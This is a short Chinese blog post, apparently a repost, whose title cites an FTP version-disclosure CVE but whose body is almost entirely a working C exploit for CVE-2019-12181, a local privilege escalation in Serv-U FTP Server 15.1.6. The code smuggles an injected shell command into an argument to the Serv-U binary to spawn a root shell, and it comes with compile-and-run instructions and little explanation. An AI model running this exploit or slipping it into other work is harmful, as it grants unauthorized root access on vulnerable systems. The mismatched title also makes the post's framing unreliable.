cve-1999-0614 ftp服务器版本信息可被获取,最新CVE-2019-12181 Serv-U FTP Server < 15.1.7 - 本地提权漏洞...

于 2021-08-13 05:08:46 发布
阅读量720 收藏
点赞数
文章标签: cve-1999-0614 ftp服务器版本信息可被获取
该博客揭示了一个CVE-2019-12181的安全漏洞,涉及Serv-U 15.1.6版本。作者Guy Levin提供了利用此漏洞进行权限提升的C语言源码,通过执行特定命令来开启root shell。博客内容包括漏洞利用方法及代码编译和运行步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

不多说,直接上源码吧/*

CVE-2019-12181 Serv-U 15.1.6 Privilege Escalation

vulnerability found by:Guy Levin (@va_start - twitter.com/va_start) https://blog.vastart.dev

to compile and run:gcc servu-pe-cve-2019-12181.c -o pe && ./pe

*/

#include 

#include 

#include 

int main(){

char *vuln_args[] = {"\" ; id; echo 'opening root shell' ; /bin/sh; \"", "-prepareinstallation", NULL};

int ret_val = execv("/usr/local/Serv-U/Serv-U", vuln_args);

// if execv is successful, we won't reach here    printf("ret val: %d errno: %d\n", ret_val, errno);

return errno;

}

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值